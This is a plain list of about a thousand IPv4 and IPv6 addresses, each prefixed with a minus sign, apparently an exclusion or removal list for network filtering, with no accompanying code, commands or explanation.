-107.163.113.53 -171.244.8.25 -123.183.129.78 -117.102.186.83 -23.19.238.32 -121.199.28.98 -200.29.18.120 -159.203.229.148 -43.230.200.17 -118.97.180.134 -49.212.25.60 -14.17.77.85 -192.228.100.118 -223.252.24.49 -103.240.213.228 -37.34.60.17 -153.127.217.189 -12.111.71.3 -23.225.239.171 -5.145.175.181 -198.200.41.51 -172.104.181.197 -69.42.94.56 -177.124.207.242 -192.241.169.11 -5.79.69.101 -153.120.3.181 -159.203.71.234 -103.193.241.130 -23.230.224.14 -172.98.197.46 -209.126.98.157 -156.235.168.60 -192.241.239.92 -120.77.1.203 -178.238.228.42 -121.199.3.235 -43.230.200.173 -154.56.1.41 -68.232.185.75 -45.40.132.181 -128.199.191.201 -43.230.202.34 -148.66.19.226 -185.26.97.221 -54.246.152.3 -172.104.48.56 -23.111.148.108 -182.16.121.194 -43.230.202.225 -43.230.200.54 -103.41.125.22 -192.52.250.9 -43.230.202.141 -64.185.234.180 -45.76.161.253 -95.85.57.84 -52.34.107.13 -192.241.247.21 -103.240.212.246 -156.235.170.120 -194.58.47.139 -156.235.171.56 -193.203.226.69 -23.235.204.6 -23.224.115.193 -216.107.153.203 -172.247.51.118 -121.41.50.235 -69.162.84.117 -120.24.82.137 -31.186.101.125 -163.44.167.119 -153.120.158.241 -58.68.243.102 -124.133.240.90 -37.59.54.106 -123.206.80.39 -211.159.186.137 -46.30.42.4 -23.247.10.179 -182.16.20.46 -62.63.191.20 -104.245.102.94 -74.206.240.5 -45.56.74.230 -176.223.202.153 -34.215.157.130 -172.246.196.250 -144.217.146.56 -87.98.139.86 -27.254.146.106 -183.61.16.233 -209.141.58.144 -125.46.49.117 -212.48.86.162 -136.0.69.54 -104.202.185.123 -121.10.140.182 -142.91.232.97 -156.235.169.15 -185.11.247.45 -123.56.67.183 -120.24.242.61 -138.197.218.180 -37.59.10.83 -54.172.107.83 -153.121.44.191 -45.76.46.253 -192.112.255.97 -45.76.99.172 -107.170.122.66 -91.225.130.82 -120.27.44.189 -5.39.121.98 -192.99.190.172 -172.255.173.216 -45.79.1.251 -37.187.174.4 -123.55.88.96 -95.216.1.119 -45.77.36.79 -43.230.202.243 -208.68.37.122 -91.121.54.40 -192.241.161.147 -174.127.72.127 -94.250.251.15 -5.178.109.119 -92.52.107.81 -23.225.113.67 -2a03:8180:1001:1a4::2a -142.44.201.206 -5.152.217.219 -109.109.120.70 -103.18.245.225 -104.131.152.228 -37.97.194.122 -91.195.200.75 -46.165.238.28 -172.247.51.10 -142.54.178.21 -193.109.69.248 -104.202.185.3 -123.57.137.201 -116.255.211.246 -185.67.1.162 -107.163.113.190 -185.104.152.227 -79.98.104.29 -173.224.116.241 -23.230.224.186 -119.38.132.210 -216.14.125.235 -31.220.59.222 -115.126.66.20 -153.121.67.182 -79.172.249.60 -2a0a:7d80:1:7::91:179 -185.13.59.106 -118.193.205.199 -211.102.210.60 -172.104.33.103 -91.239.234.224 -147.135.164.198 -109.72.239.230 -2a0a:7d80:1:7::93:17 -162.254.215.227 -194.19.246.30 -199.38.116.138 -94.23.152.119 -211.144.114.26 -153.121.41.139 -142.44.201.204 -43.230.202.145 -5.153.31.235 -188.138.102.159 -202.43.97.29 -116.213.192.164 -107.170.94.230 -122.228.159.254 -209.126.107.86 -172.107.147.16 -69.164.201.232 -2a0a:7d80:1:7::95:108 -88.214.242.122 -198.58.122.162 -2a0a:7d80:1:7::101:19c -107.164.66.16 -2600:3c00::f03c:91ff:fe33:d3e6 -174.137.166.88 -194.19.246.107 -192.198.89.34 -172.246.196.79 -192.81.219.99 -119.28.44.89 -216.224.117.12 -103.27.176.249 -109.68.190.44 -64.22.68.102 -185.66.140.182 -35.197.102.106 -134.119.148.170 -77.93.194.65 -171.208.146.87 -103.205.2.92 -103.240.213.120 -95.213.223.124 -162.243.114.126 -66.55.141.34 -171.212.141.223 -103.37.112.128 -111.67.198.149 -193.231.28.164 -112.245.48.46 -198.49.67.212 -93.115.31.75 -86.219.222.182 -190.248.84.69 -158.85.83.45 -174.138.59.73 -52.37.31.141 -37.46.128.38 -208.76.92.136 -185.87.49.139 -199.167.129.92 -121.196.233.103 -67.229.58.233 -87.239.20.210 -208.51.63.219 -2a0a:7d80:1:7::94:2c -123.56.181.251 -174.137.164.169 -104.131.13.222 -160.16.233.196 -2a0a:7d80:1:7::93:248 -121.10.140.229 -60.205.125.187 -142.4.107.75 -23.225.95.80 -79.170.95.47 -185.17.29.7 -139.162.68.62 -120.76.76.88 -23.225.113.151 -185.159.83.6 -118.184.23.39 -156.67.216.143 -220.231.133.42 -121.42.29.185 -93.115.31.35 -163.44.169.129 -192.154.139.141 -172.246.196.217 -134.119.19.20 -89.33.247.140 -103.240.214.244 -72.249.158.52 -156.235.169.23 -120.76.45.101 -156.237.179.118 -174.138.60.238 -104.207.52.98 -122.227.185.99 -41.185.26.162 -113.6.251.68 -217.61.128.238 -185.13.58.206 -103.200.22.143 -120.24.245.32 -185.4.48.109 -115.125.176.77 -89.107.60.54 -74.117.221.17 -185.76.77.213 -77.77.149.62 -136.179.4.215 -91.142.214.231 -2400:8901::f03c:91ff:fe3b:a0d8 -101.200.73.168 -37.230.97.158 -202.105.232.15 -59.106.179.29 -119.9.109.26 -2a0a:7d80:1:7::91:251 -222.82.36.178 -217.23.11.152 -183.221.100.176 -188.120.244.217 -43.230.201.96 -172.246.220.27 -95.85.31.54 -156.235.171.58 -185.12.111.179 -2a0a:7d80:1:7::103:3d1 -204.44.66.181 -93.183.211.110 -45.113.160.100 -121.42.147.64 -178.33.10.160 -2a0a:7d80:1:7::91:148 -2a0a:7d80:1:7::91:1d8 -23.225.113.130 -172.255.173.109 -47.52.77.28 -107.165.201.224 -155.94.69.199 -160.16.230.187 -43.230.201.178 -120.78.248.177 -149.202.241.88 -149.210.160.71 -212.115.229.84 -183.15.121.210 -50.112.187.240 -159.89.229.100 -198.58.112.42 -2a0a:7d80:1:7::95:157 -2001:e42:107:1008::5fe:a9cb -52.86.16.144 -190.77.250.135 -194.19.246.96 -104.251.238.130 -120.76.76.66 -217.65.3.25 -172.252.10.96 -122.9.22.155 -43.243.32.42 -142.91.95.155 -91.200.43.219 -150.95.140.140 -103.240.214.179 -2a0a:7d80:1:7::104:1d -104.207.50.107 -69.16.215.175 -103.240.214.196 -45.32.152.43 -193.124.17.200 -125.253.125.5 -64.20.35.18 -85.194.236.123 -89.238.247.8 -45.34.183.151 -51.254.80.217 -103.100.157.60 -173.212.248.198 -216.224.117.28 -2a0a:7d80:1:9::99:2c1 -115.125.176.206 -46.254.20.158 -185.116.215.35 -82.196.15.80 -173.245.76.46 -123.57.215.222 -185.81.165.4 -118.89.35.200 -163.172.55.46 -112.121.107.9 -107.164.66.84 -50.63.55.113 -104.149.66.177 -174.137.164.187 -185.17.181.162 -45.77.20.192 -111.67.198.116 -139.162.35.231 -112.74.68.204 -185.45.72.38 -43.230.200.7 -172.246.220.247 -156.235.169.165 -45.119.83.74 -58.64.231.115 -104.207.50.66 -188.138.107.177 -195.8.206.140 -185.50.196.243 -2a01:4f8:202:34d2::2 -160.16.221.241 -115.125.176.232 -163.44.175.245 -2a03:b0c0:3:d0::4b:2001 -133.242.152.197 -185.4.48.102 -222.165.217.75 -121.78.196.182 -50.23.72.181 -91.215.54.101 -118.69.195.174 -106.14.37.234 -23.104.135.117 -109.235.67.165 -65.60.46.157 -122.9.29.209 -96.44.140.58 -2a0a:7d80:1:7::93:1fa -104.143.41.25 -154.56.1.3 -54.223.247.197 -2a01:4f8:190:4348::2 -183.136.236.187 -37.59.102.212 -2a0a:7d80:1:7::104:8a -136.0.69.122 -78.108.94.69 -2a0a:7d80:1:7::107:be -43.230.203.150 -50.207.254.203 -74.201.38.95 -58.210.113.242 -208.52.157.228 -158.199.141.106 -5.135.118.233 -213.131.229.25 -74.82.168.33 -125.39.139.71 -139.196.165.2 -128.208.201.21 -52.128.225.13 -198.50.224.125 -156.235.171.46 -150.95.143.153 -61.128.111.161 -107.178.149.90 -172.246.196.77 -140.124.13.50 -122.9.235.240 -27.153.5.28 -173.236.78.87 -5.178.109.155 -192.69.219.13 -2a0a:7d80:1:7::103:13c -31.28.163.205 -203.174.13.150 -216.224.117.168 -120.25.193.207 -205.186.166.71 -122.226.90.202 -23.225.148.85 -5.178.109.132 -185.92.72.100 -107.187.41.124 -172.96.14.3 -104.128.230.41 -123.56.20.34 -50.22.189.132 -172.246.220.222 -2001:7a8:1:121:d6ae:52ff:fec6:ed75 -183.232.9.205 -5.145.174.38 -146.185.155.76 -120.26.101.68 -107.186.35.215 -142.54.178.20 -222.255.168.92 -50.22.188.72 -211.149.250.144 -68.68.111.9 -23.225.95.190 -2a01:7e00::f03c:91ff:fe70:b529 -2a0a:7d80:1:7::91:1f7 -200.145.29.4 -163.172.21.151 -108.166.208.102 -91.121.254.193 -46.17.97.92 -178.57.195.4 -104.202.185.6 -209.222.20.157 -125.46.34.163 -103.240.212.254 -107.155.118.131 -23.225.95.213 -156.235.170.99 -210.245.90.182 -159.203.253.85 -149.56.123.215 -119.59.101.248 -113.107.188.182 -139.196.36.187 -192.36.209.127 -112.64.140.253 -71.19.249.114 -201.73.144.145 -103.7.59.231 -193.136.128.182 -208.43.235.108 -60.162.115.122 -119.29.23.33 -94.126.174.7 -122.155.16.103 -200.52.21.85 -104.148.100.98 -43.230.201.171 -66.193.142.8 -35.200.65.249 -187.102.41.77 -111.67.198.98 -184.107.210.109 -78.140.179.107 -2a0a:7d80:1:7::95:328 -84.200.25.101 -107.163.113.224 -23.225.95.203 -67.229.72.108 -115.125.176.133 -172.255.173.213 -159.89.198.18 -23.230.19.201 -115.159.124.37 -120.24.169.220 -216.224.117.197 -31.179.249.207 -219.139.35.90 -198.37.113.201 -103.45.102.187 -37.59.76.117 -103.37.112.14 -185.56.235.199 -172.102.197.173 -171.244.8.147 -2600:3c00::f03c:91ff:fe67:58e2 -120.26.125.97 -185.13.56.147 -23.225.95.61 -141.138.195.197 -185.4.48.115 -185.66.173.225 -43.230.200.239 -65.60.43.166 -172.247.51.174 -107.160.163.249 -160.16.125.60 -69.65.56.179 -31.14.18.160 -190.210.186.55 -166.62.126.44 -103.48.82.23 -103.48.82.117 -88.82.102.45 -59.110.48.63 -124.173.116.210 -172.246.196.222 -92.38.129.22 -46.249.38.186 -201.73.1.121 -195.88.84.46 -43.230.202.106 -93.90.114.17 -103.240.212.39 -188.165.250.215 -123.207.155.253 -5.45.70.24 -96.126.106.105 -209.95.39.149 -218.93.206.32 -103.193.241.129 -103.240.214.144 -123.30.171.121 -123.30.135.228 -173.198.201.79 -91.142.92.73 -108.168.174.123 -35.201.204.184 -103.240.214.176 -37.1.212.3 -95.213.224.37 -94.231.164.3 -104.202.185.70 -191.101.159.31 -69.50.195.51 -123.55.91.122 -85.143.211.239 -153.126.187.133 -91.195.200.78 -185.46.53.113 -23.244.241.2 -103.240.215.36 -81.88.208.240 -88.214.242.123 -2a0a:7d80:1:7::102:15f -198.46.134.69 -103.240.212.137 -190.12.80.170 -37.9.169.102 -212.66.193.118 -46.20.236.150 -178.33.67.55 -209.200.43.178 -91.195.124.145 -43.230.200.143 -174.139.52.165 -67.228.171.210 -45.64.1.76 -43.230.201.84 -2a01:4f8:191:504d::2 -133.242.186.194 -217.119.239.50 -138.128.124.224 -198.211.127.30 -5.9.208.227 -142.91.232.79 -43.230.203.110 -115.125.176.48 -163.182.172.102 -2600:3c03::f03c:91ff:fe6e:ea28 -216.107.153.242 -218.244.139.126 -183.61.84.36 -112.74.101.163 -163.44.138.32 -210.5.41.28 -115.182.209.185 -114.113.226.247 -182.48.23.41 -121.201.38.193 -115.125.176.134 -123.56.146.41 -62.138.142.9 -159.203.93.145 -103.41.124.241 -2a0a:7d80:1:7::92:107 -43.230.202.167 -45.32.32.182 -121.41.29.157 -115.125.176.128 -174.139.33.123 -162.243.218.26 -120.55.167.132 -85.118.133.85 -153.120.78.101 -103.237.145.19 -82.208.140.98 -35.166.124.58 -216.107.153.156 -185.96.4.180 -23.225.113.193 -103.28.38.172 -114.55.219.2 -119.23.19.117 -121.43.114.215 -45.61.114.39 -23.225.95.237 -180.131.41.177 -208.167.226.38 -122.224.33.61 -69.42.79.249 -125.64.38.121 -103.198.45.44 -185.61.138.75 -83.149.67.201 -156.235.168.62 -43.230.201.185 -205.186.128.128 -94.231.15.231 -103.240.215.170 -218.21.35.150 -109.169.59.39 -188.166.23.206 -120.26.61.61 -23.110.56.76 -94.46.160.62 -120.42.0.117 -163.172.122.106 -23.247.10.187 -112.74.131.142 -27.131.249.227 -43.254.219.85 -198.98.103.171 -141.138.196.174 -2001:4801:1261:2db:3ea8:2aff:fe13:7444 -218.232.75.133 -79.124.59.242 -172.245.127.188 -120.24.244.236 -142.0.250.188 -149.62.172.10 -23.104.135.239 -23.225.95.41 -91.121.238.113 -23.225.95.93 -2a0a:7d80:1:9::99:28d -185.12.111.114 -119.28.85.188 -54.216.15.96 -43.230.203.135 -104.131.145.201 -104.202.185.212 -156.235.172.90 -45.35.99.146 -142.91.239.70 -194.1.204.5 -154.56.1.42 -49.212.213.142 -2a0a:7d80:1:7::100:1a -68.171.211.78 -149.62.168.100 -199.48.144.61 -46.232.141.12 -142.91.95.235 -43.230.202.116 -119.181.100.50 -43.241.208.163 -172.107.71.33 -83.101.154.4 -89.33.247.25 -160.16.207.112 -121.40.161.62 -177.52.160.105 -149.62.168.109 -37.187.248.117 -43.230.202.108 -5.135.115.24 -122.224.72.222 -103.237.144.15 -209.126.106.166 -47.93.172.186 -95.183.3.50 -162.211.94.171 -2a0a:7d80:1:7::92:1a4 -23.110.47.225 -209.53.155.213 -94.124.90.178 -202.77.98.165 -5.196.83.75 -27.254.146.18 -93.186.104.85 -123.9.202.89 -192.254.153.223 -104.207.40.139 -109.73.168.197 -110.86.24.26 -47.90.73.131 -188.138.125.254 -216.93.248.84 -145.239.102.113 -218.95.3.94 -120.132.77.30 -45.61.115.25 -120.27.26.35 -111.67.198.111 -202.68.185.34 -173.252.192.44 -2a0a:7d80:1:7::100:2a2 -103.240.213.251 -43.230.202.30 -54.219.34.218 -81.4.104.51 -92.43.117.196 -142.91.239.121 -162.248.208.201 -163.44.167.52 -185.12.111.55 -120.24.251.18 -45.77.246.103 -192.99.10.187 -69.163.35.61 -173.252.197.99 -172.246.220.41 -172.246.220.94 -80.233.244.13 -78.137.101.179 -103.100.157.14 -163.172.229.127 -107.163.113.123 -120.26.221.94 -154.56.1.16 -114.215.124.207 -91.237.109.34 -104.202.185.33 -65.60.5.115 -39.104.74.159 -62.76.176.48 -50.93.197.10 -31.222.185.33 -172.255.173.146 -107.164.66.114 -23.225.113.109 -150.95.137.109 -95.163.248.98 -119.29.197.201 -142.91.241.77 -185.184.208.67 -212.83.147.192 -173.241.112.19 -133.242.150.38 -156.235.172.85 -2605:6280:1:d::27 -42.237.126.20 -2a01:4f8:191:6145::2 -147.135.206.184 -103.100.157.183 -31.3.103.246 -103.205.3.75 -111.20.168.154 -120.55.243.138 -2a0a:7d80:1:9::98:229 -43.230.201.123 -167.114.33.20 -185.20.226.99 -2a01:4f8:110:51ef::2 -114.4.139.83 -172.93.156.3 -83.64.108.217 -149.62.170.158 -142.91.232.118 -5.178.109.154 -146.71.98.226 -169.47.215.109 -5.45.78.152 -172.255.173.37 -104.232.102.166 -182.16.8.166 -64.22.68.97 -103.28.37.46 -64.22.68.40 -109.169.59.126 -113.196.233.150 -27.123.223.178 -123.207.0.243 -112.74.210.39 -121.224.12.168 -208.75.150.90 -112.74.104.31 -96.45.180.4 -2400:8901::f03c:91ff:fe67:6c80 -198.37.112.222 -108.179.224.211 -68.169.51.56 -107.160.163.235 -78.40.228.236 -46.101.200.235 -202.150.172.41 -5.45.75.61 -218.62.185.180 -157.52.240.69 -52.192.137.66 -205.147.99.73 -172.246.196.125 -43.230.202.230 -88.85.79.198 -164.52.150.231 -107.173.42.199 -71.19.249.102 -51.254.199.168 -86.59.99.100 -51.254.199.168 -86.59.99.100 -104.232.102.131 -107.178.149.97 -103.240.213.20 -202.47.112.50 -202.147.206.254 -194.14.242.144 -182.16.110.166 -59.124.155.83 -106.14.27.54 -86.105.207.139 -82.135.148.56 -104.232.102.182 -2a0a:7d80:1:7::92:126 -107.165.201.10 -45.42.94.146 -115.125.176.7 -103.208.204.10 -172.104.248.60 -203.143.21.186 -91.134.28.99 -193.40.55.122 -136.0.69.254 -91.134.126.127 -107.186.35.187 -103.240.212.205 -103.240.212.118 -2a00:1910::614f:39c -119.29.109.135 -110.189.31.170 -23.225.95.200 -166.78.149.100 -148.251.31.104 -192.155.88.44 -2a01:7c8:fffa:83::8:1 -172.255.173.201 -103.240.214.118 -208.100.13.33 -166.62.124.33 -195.123.209.108 -180.150.177.134 -216.107.153.195 -107.191.117.234 -2a0a:7d80:1:7::95:2f5 -112.124.62.93 -5.45.73.169 -173.239.30.254 -185.98.63.131 -185.13.58.78 -185.4.48.112 -104.236.243.42 -64.120.123.160 -149.202.221.10 -103.240.212.9 -210.142.80.61 -192.186.175.85 -178.170.217.33 -221.143.20.205 -64.6.108.97 -216.224.117.198 -103.16.141.76 -189.90.16.68 -211.154.249.35 -2001:e42:107:1008:0:8152:881:1895 -23.247.10.176 -120.26.133.2 -117.25.149.246 -54.166.139.207 -103.100.157.132 -122.9.22.140 -89.26.252.218 -120.25.87.229 -92.247.87.66 -149.154.159.160 -172.107.71.36 -172.247.51.190 -103.37.148.68 -168.235.94.74 -178.33.36.34 -120.92.233.8 -107.180.69.255 -192.3.117.141 -156.237.179.113 -216.224.117.61 -2a00:1d70:c01c::111:167 -188.226.153.165 -112.91.157.96 -5.188.204.108 -209.58.180.17 -91.134.3.248 -104.247.202.6 -199.167.40.238 -159.148.20.104 -64.235.56.227 -103.1.236.27 -172.246.220.57 -209.212.145.32 -118.178.130.93 -23.224.115.215 -174.129.231.36 -23.225.95.98 -52.67.208.173 -103.250.94.247 -23.225.95.238 -46.105.166.134 -142.91.232.105 -216.224.117.41 -194.145.208.224 -195.154.38.179 -172.104.109.202 -13.231.160.94 -111.23.28.68 -198.200.41.66 -118.178.16.92 -46.20.71.186 -198.176.55.17 -107.180.68.185 -46.166.160.40 -195.82.149.110 -70.32.104.253 -139.129.228.157 -107.163.113.243 -88.214.242.96 -172.255.173.241 -118.190.172.131 -2a0a:7d80:1:7::91:5b -120.77.238.52 -46.175.224.57 -202.43.163.116 -154.56.1.38 -128.199.70.119 -46.101.159.92 -185.38.165.138 -118.178.225.170 -107.178.162.83 -176.31.36.199 -149.202.194.71 -192.241.226.216 -133.242.29.134 -58.84.16.18 -2400:8900::f03c:91ff:fe69:52f8 -185.4.48.26 -101.71.9.53 -80.252.224.16 -142.4.107.118 -45.79.176.53 -156.235.170.121 -50.116.43.76 -2001:978:9200:0:140:: -67.55.67.237 -66.175.211.36 -69.4.98.194 -5.39.31.89 -128.199.230.230 -128.199.104.148 -188.116.7.22 -23.227.178.31 -120.26.38.99 -120.40.101.100 -153.36.232.232 -123.52.78.115 -178.172.161.44 -186.121.203.115 -120.24.240.237 -2a0a:7d80:1:7::91:7 -139.196.106.20 -103.48.83.150 -45.76.190.140 -192.81.213.78 -46.252.27.65 -175.211.11.144 -103.10.190.253 -173.249.32.190 -104.207.44.74 -197.249.0.219 -5.145.174.98 -115.125.176.81 -216.224.117.19 -5.77.63.84 -112.74.124.59 -95.213.232.253 -104.131.125.110 -205.186.154.174 -43.230.201.226 -5.199.168.72 -120.132.18.249 -173.252.197.106 -139.199.10.62 -178.32.138.142 -87.98.138.182 -155.254.16.29 -103.253.115.192 -37.252.96.19 -112.124.12.95 -185.13.57.244 -103.35.120.97 -89.218.97.26 -37.49.138.91 -194.88.219.190 -162.243.196.181 -172.106.186.6 -43.230.203.182 -69.87.197.244 -157.119.233.157 -163.172.40.125 -2001:978:9200:0:146:: -74.208.161.134 -72.52.137.112 -45.35.99.139 -121.41.1.151 -124.202.145.74 -47.93.113.4 -217.23.6.120 -112.74.92.155 -66.70.243.38 -60.208.77.214 -172.104.39.231 -142.91.232.100 -217.116.47.143 -115.125.176.55 -115.28.243.118 -185.122.58.216 -172.255.159.200 -27.254.146.31 -109.68.47.43 -150.95.145.171 -123.249.28.222 -185.92.72.94 -148.66.10.132 -87.76.28.92 -201.184.96.196 -95.169.186.189 -104.215.49.59 -43.230.200.170 -5.178.109.126 -107.164.66.150 -192.3.109.53 -120.78.15.59 -74.115.103.138 -52.67.54.134 -43.246.173.165 -217.20.130.23 -51.254.178.163 -23.88.82.208 -43.230.203.15 -2403:2500:8000:1::934 -185.63.190.191 -210.5.43.51 -216.224.117.30 -31.28.163.198 -72.249.141.200 -51.254.98.190 -178.18.196.149 -192.3.165.158 -122.114.97.72 -119.28.51.192 -195.154.32.80 -98.124.176.103 -136.0.69.137 -46.105.58.252 -142.4.213.228 -146.255.62.154 -103.55.13.161 -209.126.64.48 -202.6.17.171 -185.13.56.161 -192.154.139.140 -121.42.181.163 -62.8.88.153 -2a0a:7d80:1:7::102:15a -108.174.154.152 -107.180.85.39 -5.39.25.58 -107.179.93.38 -2a01:8e00:4::134 -63.141.245.92 -23.253.41.150 -185.27.134.99 -163.49.89.11 -188.165.199.222 -89.207.146.132 -2600:3c03::f03c:91ff:fe50:8a1f -188.165.119.238 -119.93.27.160 -2400:8901::f03c:91ff:fe67:b0b1 -104.236.150.70 -178.49.143.5 -144.168.72.131 -193.95.37.134 -139.224.29.129 -149.71.97.200 -121.78.127.167 -103.41.125.13 -185.191.197.87 -103.230.120.229 -192.241.137.115 -58.210.43.36 -103.240.213.100 -2a0a:7d80:1:7::105:18 -138.201.29.231 -2a0a:7d80:1:7::101:b8 -172.107.73.253 -139.196.33.83 -107.164.66.79 -27.254.146.217 -123.56.186.94 -120.77.203.12 -172.255.173.36 -5.45.71.69 -114.141.111.205 -2a0a:7d80:1:9::99:163 -114.215.30.215 -5.178.109.231 -2a0a:7d80:1:7::96:6f -172.246.196.201 -198.50.161.33 -159.148.192.232 -183.88.225.36 -173.193.39.247 -83.149.67.204 -101.200.89.166 -103.41.125.36 -64.22.68.109 -103.240.212.81 -185.191.228.146 -211.149.225.154 -222.172.150.131 -83.212.171.86 -185.17.29.14 -23.238.166.147 -117.114.227.4 -216.107.153.254 -198.50.143.48 -59.63.158.28 -103.210.237.191 -31.28.10.43 -107.187.41.28 -198.235.132.75 -68.232.188.214 -121.42.167.51 -187.72.167.115 -58.211.138.116 -95.85.29.68 -142.91.232.82 -149.202.223.180 -103.12.49.47 -2001:4800:7814:0:2210:18f9:ff04:9780 -173.239.39.133 -2a00:f940:2:1:2::10f5 -77.92.133.141 -119.29.102.217 -176.31.255.20 -163.172.203.252 -217.18.43.104 -96.9.161.47 -159.93.229.150 -107.163.113.241 -147.135.10.63 -2600:3c00::f03c:91ff:fe37:d3f -43.249.8.44 -23.225.113.97 -163.44.164.39 -2400:8901::f03c:91ff:fe1f:1e68 -37.148.211.190 -37.58.83.72 -80.77.87.66 -85.133.189.20 -36.89.68.34 -51.254.100.109 -23.238.176.254 -80.87.195.63 -5.175.42.28 -75.126.165.220 -103.14.149.42 -188.226.167.214 -66.254.160.10 -27.254.152.63 -115.159.154.142 -2600:3c03::f03c:91ff:fedf:768a -103.240.212.86 -103.100.157.247 -101.200.194.234 -2a0a:7d80:1:7::102:26 -116.62.63.233 -2a0a:7d80:1:9::99:7c -194.187.96.78 -120.55.166.204 -92.222.208.169 -42.51.130.20 -85.206.175.204 -104.149.66.164 -159.8.13.53 -82.166.139.88 -139.162.30.53 -178.18.204.76 -120.92.234.190 -2600:3c03::f03c:91ff:fe89:7130 -180.175.63.70 -46.165.48.31 -77.222.132.2 -104.207.40.180 -185.122.140.3 -188.132.157.20 -2001:e42:107:1008:ac1e:fb66:1b85:88a4 -185.122.140.5 -2a01:4f8:140:4167::2 -98.124.176.197 -23.224.115.9 -116.255.158.5 -175.102.9.108 -103.240.215.112 -91.230.236.75 -184.175.106.247 -49.212.129.227 -2a02:16d8:104:1:250:56ff:fe85:71ef -23.230.19.23 -123.57.247.94 -133.242.13.94 -45.35.125.56 -88.85.75.102 -27.120.84.96 -150.95.172.68 -176.10.114.239 -2804:1088::106 -95.183.3.22 -5.77.38.13 -188.166.74.230 -104.148.100.114 -120.77.106.126 -185.66.173.223 -187.63.160.23 -192.254.209.9 -186.121.251.68 -103.205.1.115 -52.200.228.44 -182.18.166.20 -91.134.231.29 -122.9.18.174 -23.239.18.103 -107.164.66.222 -91.230.194.90 -2600:3c03::f03c:91ff:fe69:1292 -142.4.107.73 -145.239.80.123 -211.149.225.45 -213.142.148.38 -104.236.246.27 -202.146.208.174 -185.12.111.136 -118.193.176.23 -93.190.44.137 -182.16.59.206 -103.224.241.213 -23.230.19.110 -192.154.97.5 -89.208.156.114 -104.238.85.29 -210.73.216.158 -93.180.153.13 -109.235.250.245 -49.212.219.40 -203.25.227.182 -92.62.138.194 -144.217.13.173 -23.230.19.130 -150.95.184.55 -50.28.19.234 -199.168.189.4 -23.244.241.186 -198.199.125.194 -120.92.228.208 -2a0a:7d80:1:7::95:334 -43.230.201.66 -43.230.201.35 -103.240.215.95 -110.10.40.218 -208.94.238.42 -23.230.224.54 -103.244.1.253 -35.172.230.73 -172.106.184.3 -82.199.155.26 -2a02:4780:1:1::1:85dd -107.187.41.179 -175.126.62.171 -104.128.230.35 -161.202.98.187 -134.119.120.194 -37.139.6.132 -185.52.26.118 -173.244.204.40 -107.165.201.108 -199.101.134.201 -47.92.112.159 -2600:3c03::f03c:91ff:fe89:9978 -177.86.200.3 -2a01:488:67:1000:253d:c981:0:1 -123.60.202.206 -142.91.232.98 -104.171.188.83 -193.206.157.181 -223.71.153.69 -203.75.237.18 -218.232.75.148 -142.91.241.85 -91.250.102.95 -2a0a:7d80:1:7::91:2a3 -209.15.212.187 -80.77.95.15 -59.120.48.8 -5.178.109.244 -162.243.15.249 -50.116.8.44 -96.45.180.2 -172.106.186.43 -210.59.244.23 -184.173.134.103 -185.12.6.196 -68.64.172.84 -185.190.81.34 -50.116.37.13 -178.79.161.248 -121.201.65.47 -43.230.203.195 -128.199.70.24 -45.79.95.229 -2600:3c03::f03c:91ff:fedb:6eb7 -2607:f1c0:83f:9400::3e:fe2f -125.5.112.207 -67.229.63.88 -103.240.213.176 -27.102.69.50 -46.105.16.238 -193.203.226.55 -203.154.73.30 -52.221.205.190 -5.135.229.58 -23.225.95.8 -217.150.94.68 -192.198.84.221 -47.52.253.75 -172.255.173.233 -168.1.4.118 -121.10.118.201 -2600:3c01::f03c:91ff:fe6e:80d3 -150.107.140.53 -119.7.200.88 -2600:3c03::f03c:91ff:fe70:86ae -164.70.8.110 -83.166.226.67 -172.245.127.11 -2a01:4f8:141:3210::2 -58.27.149.254 -107.164.66.77 -178.33.139.252 -156.67.216.252 -45.76.144.242 -115.29.228.85 -23.230.19.191 -118.193.235.66 -120.25.59.14 -173.236.78.66 -149.126.16.59 -45.114.94.139 -182.163.126.248 -176.126.241.110 -42.62.90.146 -192.99.114.185 -45.40.137.31 -103.211.82.27 -27.254.146.206 -37.1.200.225 -192.190.42.105 -184.105.214.153 -101.251.253.147 -185.66.143.227 -117.114.225.53 -217.182.39.51 -83.142.226.100 -198.8.90.50 -122.235.188.161 -42.112.16.134 -47.92.31.67 -2607:f128:22:3141:312:18:314:2500 -13.113.240.18 -110.250.100.242 -27.118.26.14 -195.72.33.207 -185.85.206.195 -219.85.64.151 -62.12.114.131 -122.9.22.167 -5.153.5.43 -2a01:4f8:140:3186::2 -107.175.88.104 -43.230.203.196 -182.254.214.70 -2a0a:7d80:1:9::99:29 -41.0.185.236 -41.0.185.236 -216.117.128.129 -213.219.37.61 -122.13.169.173 -116.206.92.16 -47.93.53.203 -182.92.128.129 -142.91.239.112 -208.77.20.35 -165.227.198.129 -173.214.179.27 -43.255.243.92 -128.199.253.125 -103.28.37.35 -142.44.149.201 -185.146.86.25 -162.243.43.64 -128.199.68.164 -43.230.201.147 -104.245.102.120 -172.255.173.47 -144.217.67.145 -66.171.239.74 -31.24.231.174 -172.107.75.216 -113.208.112.45 -200.169.21.234 -153.126.137.67 -115.159.124.168 -54.154.8.147 -172.107.64.17 -103.100.157.149 -112.74.113.112 -106.15.57.162 -107.178.147.121 -14.139.59.162 -156.235.171.45 -117.23.56.194 -149.56.9.28 -138.68.166.245 -118.98.72.11 -178.32.28.174 -212.34.233.13 -218.245.3.109 -133.242.181.230 -107.180.79.191 -91.229.23.128 -113.196.87.134 -45.55.33.163 -60.12.147.103 -104.237.145.147 -50.22.159.174 -202.63.105.198 -103.28.112.6 -5.35.240.167 -172.247.51.167 -137.74.154.72 -50.232.102.31 -202.66.148.212 -103.74.175.68 -5.145.174.59 -182.254.147.143 -199.101.134.206 -45.76.9.71 -45.56.124.213 -159.122.38.112 -46.232.178.168 -108.179.236.233 -185.86.210.69 -61.139.44.85 -23.225.89.35 -218.58.78.85 -212.204.202.111 -23.239.13.238 -218.94.149.146 -88.99.245.195 -107.191.42.131 -104.202.185.245 -46.105.228.45 -174.137.161.72 -136.243.176.177 -23.238.237.105 -172.106.187.248 -104.245.102.96 -172.246.196.113 -114.241.19.11 -2600:3c03::f03c:91ff:fee4:63b4 -66.179.47.236 -91.218.228.23 -172.104.166.136 -202.43.162.43 -192.99.122.169 -175.41.24.100 -23.230.19.203 -185.176.188.26 -2600:3c00::f03c:91ff:fe33:7c48 -2600:3c00::f03c:91ff:fe6e:a0a5 -2605:6280:1:d::52 -104.203.82.62 -96.43.136.173 -106.14.241.177 -89.184.82.87 -45.76.132.150 -67.196.126.248 -94.229.74.12 -192.186.129.39 -45.34.183.153 -104.149.167.236 -118.123.247.94 -139.59.137.76 